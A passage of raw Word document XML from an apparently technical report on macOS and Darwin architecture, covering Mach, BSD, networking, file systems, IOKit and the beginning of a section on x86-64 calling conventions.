      </w:r>
      <w:r w:rsidR="009F0DDB">
        <w:t>Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00226518" w:rsidP="00226518">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:leftChars="400" w:left="880" w:firstLineChars="250" w:firstLine="550"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0925A749" wp14:editId="048F4CFA">
            <wp:extent cx="2840355" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/osx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pple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/art/osxarchitec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55" cy="1722755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354C57" w:rsidRPr="00354C57" w:rsidRDefault="00226518" w:rsidP="00226518">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mac Kernel Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A575A4" w:rsidRDefault="00354C57" w:rsidP="00A575A4">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:leftChars="400" w:left="880" w:firstLineChars="250" w:firstLine="400"/>
      </w:pPr>
      <w:r w:rsidRPr="00354C57">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidR="00A575A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30ECBC3D" wp14:editId="04FE3612">
            <wp:extent cx="5274310" cy="4224942"/>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24942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354C57" w:rsidRDefault="00A575A4" w:rsidP="00A575A4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Darwin Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652EA3" w:rsidRPr="00A575A4" w:rsidRDefault="00652EA3" w:rsidP="00652EA3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac OS X and iOS Internals, To the Apple</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s Core.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652EA3" w:rsidRPr="00652EA3" w:rsidRDefault="00652EA3" w:rsidP="00652EA3"/>
    <w:p w:rsidR="00652EA3" w:rsidRDefault="00652EA3" w:rsidP="00652EA3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BA4DC7" wp14:editId="3446728E">
            <wp:extent cx="5274310" cy="42383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238372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652EA3" w:rsidRDefault="00652EA3" w:rsidP="00652EA3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSX architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652EA3" w:rsidRPr="00652EA3" w:rsidRDefault="00652EA3" w:rsidP="00652EA3">
      <w:r w:rsidRPr="00652EA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[Mac.OS.X</w:t>
      </w:r>
      <w:r w:rsidRPr="00652EA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发系列电子书</w:t>
      </w:r>
      <w:r w:rsidRPr="00652EA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>].Mac.OS.X.Internals.-.A.Systems.Approach.chm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00226518" w:rsidP="006B4005">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00226518" w:rsidP="00A04C68">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Mach manages processor resources such as CPU usage and memory, handles scheduling, provides memory protection, and provides a messaging-centered infrastructure to the rest of the operating-system layers. The Mach component provides</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRPr="00A04C68" w:rsidRDefault="00226518" w:rsidP="00A04C68">
      <w:pPr>
        <w:ind w:leftChars="800" w:left="1760"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pP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untyped interprocess communication (IPC)</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remote procedure calls (RPC)</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scheduler support for symmetric multiprocessing (SMP)</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support for real-time services</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virtual memory support</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support for pagers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRPr="00A04C68" w:rsidRDefault="0022651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modular architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226518" w:rsidRDefault="00A04C68" w:rsidP="006B4005">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BSD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:ind w:firstLine="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Above the Mach layer, the BSD layer provides “OS personality” APIs and services. The BSD layer is based on the BSD kernel, primarily</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FreeBSD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>. The BSD component provide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file system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networking (except for the hardware device level)</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UNIX security model</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Style w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>support</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the BSD process model, including process IDs and signal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FreeBSD kernel API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many of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POSIX</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>API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kernel support for</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pthreads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(POSIX threads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="006B4005">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OS X networking takes advantage of BSD’s advanced networking capabilities to provide support for modern features, such as Network Address Translation (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>firewalls</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>. The networking component provide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4.4BSD TCP/IP stack and socket API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support for both IP and DDP (AppleTalk transport)</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multihoming</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routing</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multicast support</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server tuning</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packet filtering</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t>Mac OS Classic support (through filters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="006B4005">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File Systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:ind w:firstLine="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OS X provides support for numerous types of file systems, including</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HFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</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HFS+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</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UFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</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ISO 9660</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, and others. The default file-system type is HFS+; OS X boots (and “roots”) from HFS+, UFS, ISO, NFS, and UDF. Advanced features of OS X file systems include an enhanced Virtual File System (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>VFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) design. VFS provides for a layered architecture (file systems are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>stackable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>). The file system component provides</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UTF-8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Unicode) support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00A04C68"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A04C68">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>increased performance over previous versions of Mac OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="006B4005">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:ind w:firstLine="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>The I/O Kit provides a framework for simplified driver development, supporting many categories of devices.The I/O Kit features an object-oriented I/O architecture implemented in a restricted subset of C++. The I/O Kit framework is both modular and extensible. The I/O Kit component provides</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00885882"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true plug and play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00885882"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dynamic device management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00885882"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dynamic (“on-demand”) loading of drivers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00885882"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power management for desktop systems as well as portables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04C68" w:rsidRPr="00885882" w:rsidRDefault="00A04C68" w:rsidP="00A04C68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="160" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00885882">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>multiprocessor capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854D75" w:rsidRDefault="00854D75" w:rsidP="00854D75">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Toc445313208"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSX API function call</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00854D75" w:rsidRPr="00354C57" w:rsidRDefault="00854D75" w:rsidP="00854D75">
      <w:pPr>
        <w:ind w:leftChars="400" w:left="880" w:firstLineChars="250" w:firstLine="400"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00354C57">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854D75" w:rsidRDefault="00854D75" w:rsidP="00854D75">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x86-64 Function Calling Convensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A857C0" w:rsidRDefault="00854D75" w:rsidP="00854D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00854D75">
        <w:t>The OS X x86-64 function calling conventions are the same as the function calling conventions described in</w:t>
      </w:r>
      <w:r w:rsidRPr="00854D75">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00854D75">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">System V Application Binary Interface </w:t>
      </w:r>
      <w:r w:rsidRPr="00854D75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AMD64 Architecture Processor Supplement</w:t>
      </w:r>
      <w:r w:rsidRPr="00854D75">
        <w:t xml:space="preserve">, found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
            <w:color w:val="3366CC"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://people.freebsd.org/~obrien/amd64-elf-abi.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
